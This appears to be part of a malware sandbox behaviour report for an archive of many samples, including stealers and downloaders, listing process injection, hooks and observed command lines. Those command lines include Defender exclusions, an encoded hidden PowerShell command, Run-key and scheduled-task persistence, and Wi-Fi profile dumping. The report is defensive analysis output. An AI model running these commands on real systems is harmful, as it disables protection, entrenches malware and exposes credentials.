N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\347814563.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\c1.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\jgesfyhjsefa.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\hbfgjhhesfd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\null.exe N/A
N/A N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\835450\Mineral.com N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2728 wrote to memory of 4236 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe
PID 2728 wrote to memory of 4236 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe
PID 2728 wrote to memory of 4236 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe
PID 4236 wrote to memory of 3172 N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe C:\Users\Admin\AppData\Local\Temp\347814563.exe
PID 4236 wrote to memory of 3172 N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe C:\Users\Admin\AppData\Local\Temp\347814563.exe
PID 4236 wrote to memory of 3172 N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe C:\Users\Admin\AppData\Local\Temp\347814563.exe
PID 2876 wrote to memory of 3656 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe
PID 2876 wrote to memory of 3656 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe
PID 2876 wrote to memory of 3656 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe
PID 2876 wrote to memory of 4084 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe
PID 2876 wrote to memory of 4084 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe
PID 2876 wrote to memory of 4140 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe
PID 2876 wrote to memory of 4140 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe
PID 2876 wrote to memory of 4140 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe
PID 3172 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\347814563.exe C:\Windows\sysnldcvmr.exe
PID 3172 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\347814563.exe C:\Windows\sysnldcvmr.exe
PID 3172 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\347814563.exe C:\Windows\sysnldcvmr.exe
PID 4084 wrote to memory of 1264 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1264 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 212 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 212 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 1612 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe
PID 2876 wrote to memory of 1612 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe
PID 2876 wrote to memory of 1612 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe
PID 4084 wrote to memory of 1876 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 1876 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 2512 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4084 wrote to memory of 2512 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1356 wrote to memory of 1208 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\614016133.exe
PID 1356 wrote to memory of 1208 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\614016133.exe
PID 1356 wrote to memory of 1208 N/A C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\614016133.exe
PID 2876 wrote to memory of 5132 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
PID 2876 wrote to memory of 5132 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
PID 2876 wrote to memory of 5132 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
PID 2876 wrote to memory of 5492 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe
PID 2876 wrote to memory of 5492 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe
PID 5492 wrote to memory of 6140 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe
PID 5492 wrote to memory of 6140 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe
PID 6140 wrote to memory of 5592 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe C:\Windows\system32\cmd.exe
PID 6140 wrote to memory of 5592 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 5720 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Windows\System32\wbem\WMIC.exe
PID 2728 wrote to memory of 5720 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Windows\System32\wbem\WMIC.exe
PID 2728 wrote to memory of 5720 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Windows\System32\wbem\WMIC.exe
PID 2728 wrote to memory of 5964 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe
PID 2728 wrote to memory of 5964 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe
PID 4140 wrote to memory of 5980 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4140 wrote to memory of 5980 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4140 wrote to memory of 5980 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4140 wrote to memory of 5980 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4140 wrote to memory of 5980 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2876 wrote to memory of 2624 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe
PID 2876 wrote to memory of 2624 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe
PID 2876 wrote to memory of 2624 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe
PID 2728 wrote to memory of 5476 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe
PID 2728 wrote to memory of 5476 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe
PID 2728 wrote to memory of 6436 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe
PID 2728 wrote to memory of 6436 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe
PID 2728 wrote to memory of 6436 N/A C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe
PID 2876 wrote to memory of 7504 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe
PID 2876 wrote to memory of 7504 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe
PID 2876 wrote to memory of 7504 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe
PID 2876 wrote to memory of 5848 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe
PID 2876 wrote to memory of 5848 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe
PID 2876 wrote to memory of 5848 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\" -spe -an -ai#7zMap10417:140:7zEvent8427

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\*\" -spe -an -ai#7zMap1429:384:7zEvent28339

C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"

C:\Users\Admin\AppData\Local\Temp\347814563.exe

C:\Users\Admin\AppData\Local\Temp\347814563.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\TestExe.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe"

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\x.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'

C:\Users\Admin\AppData\Local\Temp\614016133.exe

C:\Users\Admin\AppData\Local\Temp\614016133.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\system32.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5720 -ip 5720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 440

C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe

"C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAUAByAG8AZAB1AGMAdAAuAGUAeABlADsA

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f

C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\build2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7296 -ip 7296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7296 -s 440

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\1989810276.exe

C:\Users\Admin\AppData\Local\Temp\1989810276.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe

"C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe

